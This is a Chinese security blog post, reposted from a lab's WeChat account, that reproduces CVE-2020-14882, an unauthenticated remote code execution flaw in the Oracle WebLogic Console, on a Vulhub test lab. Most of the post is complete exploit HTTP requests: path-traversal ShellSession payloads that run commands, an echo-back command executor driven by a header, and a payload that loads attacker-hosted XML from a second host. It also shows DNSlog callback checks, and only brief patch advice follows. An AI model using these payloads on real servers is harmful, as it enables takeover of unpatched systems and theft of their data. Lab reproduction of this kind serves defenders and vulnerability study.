CVE-2020-14882 eblogic Console远程代码执行漏洞复现(豪华版)

  • A+
所属分类:安全文章



网安引领时代,弥天点亮未来   






 

CVE-2020-14882 eblogic Console远程代码执行漏洞复现(豪华版)

0x00漏洞简述

2020年10月30日, Oracle 官方的 CVE-2020-14882 Weblogic 代码执行漏洞最新补丁可被绕过,该漏洞编号为 CVE-2020-14882 ,漏洞等级:严重 ,漏洞评分:9.8 。

远程攻击者可以构造特殊的 HTTP 请求,在未经身份验证的情况下接管 WebLogic Server Console ,并在 WebLogic ServerConsole 执行任意代码。


CVE-2020-14882 eblogic Console远程代码执行漏洞复现(豪华版)

0x01影响版本


Oracle WeblogicServer 10.3.6.0.0

Oracle WeblogicServer 12.1.3.0.0

Oracle WeblogicServer 12.2.1.3.0

Oracle WeblogicServer 12.2.1.4.0

Oracle WeblogicServer 14.1.1.0.0

CVE-2020-14882 eblogic Console远程代码执行漏洞复现(豪华版)

0x02漏洞复现


虚拟机部署docker安装Vulhub一键搭建漏洞测试靶场环境。

docker-compose up -d

CVE-2020-14882 eblogic Console远程代码执行漏洞复现(豪华版)

1、访问漏洞环境

http://192.168.60.130:7001/console/login/LoginForm.jsp

CVE-2020-14882 eblogic Console远程代码执行漏洞复现(豪华版)


2、在漏洞利用时根据不同需求进行Pyload构造。目前有常用的三种:

1.执行payload后不回显,但是已经执行成功。

构造payload执行:

GET /console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runtime.getRuntime().exec('touch%20/tmp/yunzui');") HTTP/1.1Host: 192.168.60.130:7001Cache-Control: max-age=0DNT: 1Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.75 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Referer: http://192.168.60.130:7001/console/Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: ADMINCONSOLESESSION=-KSLiFfIosk7pDYFYp701K0Svy9__G8yZefB7whwyLGLvkhjKbTD!-355433482Connection: closeContent-Length: 4

CVE-2020-14882 eblogic Console远程代码执行漏洞复现(豪华版)

效果查看

CVE-2020-14882 eblogic Console远程代码执行漏洞复现(豪华版)

或者使用dnslog平台进行验证

生成DNS域名:idvek9.dnslog.cn

CVE-2020-14882 eblogic Console远程代码执行漏洞复现(豪华版)

构造payload进行执行

CVE-2020-14882 eblogic Console远程代码执行漏洞复现(豪华版)


效果查看

CVE-2020-14882 eblogic Console远程代码执行漏洞复现(豪华版)

或者使用python脚本进行漏洞利用

CVE-2020-14882 eblogic Console远程代码执行漏洞复现(豪华版)

效果查看

CVE-2020-14882 eblogic Console远程代码执行漏洞复现(豪华版)

2.执行payload后回显

通过GET方式进行payload提交

GET/console/css/%25%32%65%25%32%65%25%32%66consolejndi.portal?test_handle=com.tangosol.coherence.mvel2.sh.ShellSession('weblogic.work.ExecuteThreadcurrentThread = (weblogic.work.ExecuteThread)Thread.currentThread();weblogic.work.WorkAdapter adapter = currentThread.getCurrentWork();java.lang.reflect.Field field =adapter.getClass().getDeclaredField("connectionHandler");field.setAccessible(true);Objectobj = field.get(adapter);weblogic.servlet.internal.ServletRequestImpl req =(weblogic.servlet.internal.ServletRequestImpl)obj.getClass().getMethod("getServletRequest").invoke(obj);String cmd = req.getHeader("cmd");String[] cmds = System.getProperty("os.name").toLowerCase().contains("window")? new String[]{"cmd.exe", "/c", cmd} : newString[]{"/bin/sh", "-c", cmd};if(cmd != null ){ Stringresult = new java.util.Scanner(new java.lang.ProcessBuilder(cmds).start().getInputStream()).useDelimiter("\A").next();weblogic.servlet.internal.ServletResponseImpl res =(weblogic.servlet.internal.ServletResponseImpl)req.getClass().getMethod("getResponse").invoke(req);res.getServletOutputStream().writeStream(newweblogic.xml.util.StringInputStream(result));res.getServletOutputStream().flush();}currentThread.interrupt();') HTTP/1.1Host:192.168.60.130:7001Upgrade-Insecure-Requests:1User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, likeGecko) Chrome/86.0.4240.111 Safari/537.36Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding:gzip, deflateAccept-Language:zh-CN,zh;q=0.9Connection: closecmd:idContent-Length: 0

执行:id

CVE-2020-14882 eblogic Console远程代码执行漏洞复现(豪华版)

通过POST方式进行payload提交

POST/console/css/%252e%252e%252fconsole.portal HTTP/1.1Host:192.168.60.130:7001cmd: idUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, likeGecko) Chrome/85.0.4183.121 Safari/537.36Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding:gzip, deflateAccept-Language:zh-CN,zh;q=0.9Connection: closeContent-Type:application/x-www-form-urlencodedContent-Length: 1258 _nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("weblogic.work.ExecuteThreadexecuteThread = (weblogic.work.ExecuteThread) Thread.currentThread();weblogic.work.WorkAdapteradapter = executeThread.getCurrentWork();java.lang.reflect.Fieldfield = adapter.getClass().getDeclaredField("connectionHandler");field.setAccessible(true);Object obj =field.get(adapter);weblogic.servlet.internal.ServletRequestImplreq = (weblogic.servlet.internal.ServletRequestImpl) obj.getClass().getMethod("getServletRequest").invoke(obj);String cmd =req.getHeader("cmd");String[] cmds =System.getProperty("os.name").toLowerCase().contains("window")? new String[]{"cmd.exe", "/c", cmd} : newString[]{"/bin/sh", "-c", cmd};if (cmd != null) {    String result = newjava.util.Scanner(java.lang.Runtime.getRuntime().exec(cmds).getInputStream()).useDelimiter("\A").next();   weblogic.servlet.internal.ServletResponseImpl res =(weblogic.servlet.internal.ServletResponseImpl)req.getClass().getMethod("getResponse").invoke(req);   res.getServletOutputStream().writeStream(newweblogic.xml.util.StringInputStream(result));    res.getServletOutputStream().flush();    res.getWriter().write("");}executeThread.interrupt();");

执行:id

CVE-2020-14882 eblogic Console远程代码执行漏洞复现(豪华版)


3.通过把payload构造为XML格式进行引用

CVE-2020-14882 eblogic Console远程代码执行漏洞复现(豪华版)

通过DNSLog平台生成域名:

bq11vi.dnslog.cn

CVE-2020-14882 eblogic Console远程代码执行漏洞复现(豪华版)

执行(GET)

GET /console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext("http://192.168.60.1/weblogic.xml")HTTP/1.1Host: 192.168.60.130:7001Cache-Control: max-age=0DNT: 1Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.75 Safari/537.36Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Referer: http://192.168.60.130:7001/console/Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie:ADMINCONSOLESESSION=-KSLiFfIosk7pDYFYp701K0Svy9__G8yZefB7whwyLGLvkhjKbTD!-355433482Connection: close

CVE-2020-14882 eblogic Console远程代码执行漏洞复现(豪华版)


效果查看

CVE-2020-14882 eblogic Console远程代码执行漏洞复现(豪华版)

执行(POST)

POST /console/images/%252E%252E%252Fconsole.portalHTTP/1.1Host: 192.168.60.130:7001User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36Accept-Encoding: gzip, deflateAccept: */*Connection: keep-aliveContent-type: application/x-www-form-urlencoded;charset=utf-8Content-Length: 153CMD:whoami _nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext("http://192.168.60.1/weblogic.xml")

CVE-2020-14882 eblogic Console远程代码执行漏洞复现(豪华版)

效果查看

CVE-2020-14882 eblogic Console远程代码执行漏洞复现(豪华版)

CVE-2020-14882 eblogic Console远程代码执行漏洞复现(豪华版)

0x03修复建议


1、建议用户及时将 Weblogic 后台/console/console.portal 对外的访问权限暂时关闭。

2、此次 Oracle 官方的 CPU已发布了针对该漏洞的补丁,请受影响用户及时下载补丁程序并安装更新。

注:Oracle官方补丁需要用户持有正版软件的许可账号,使用该账号登陆https://support.oracle.com后,可以下载最新补丁。




0x05参考链接



https://www.safedog.cn/news.html?id=4533

http://blog.nsfocus.net/weblogic-console-http-1028/

https://leaderzhang.com/


关注弥天安全实验室微信公众平台,回复weblogic获取POC及Python脚本!




CVE-2020-14882 eblogic Console远程代码执行漏洞复现(豪华版) 

知识分享完了

喜欢别忘了关注我们哦~



学海浩茫,

予以风动,
必降弥天之润!


   弥  天

安全实验室

CVE-2020-14882 eblogic Console远程代码执行漏洞复现(豪华版)



本文始发于微信公众号(弥天安全实验室):CVE-2020-14882 eblogic Console远程代码执行漏洞复现(豪华版)

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: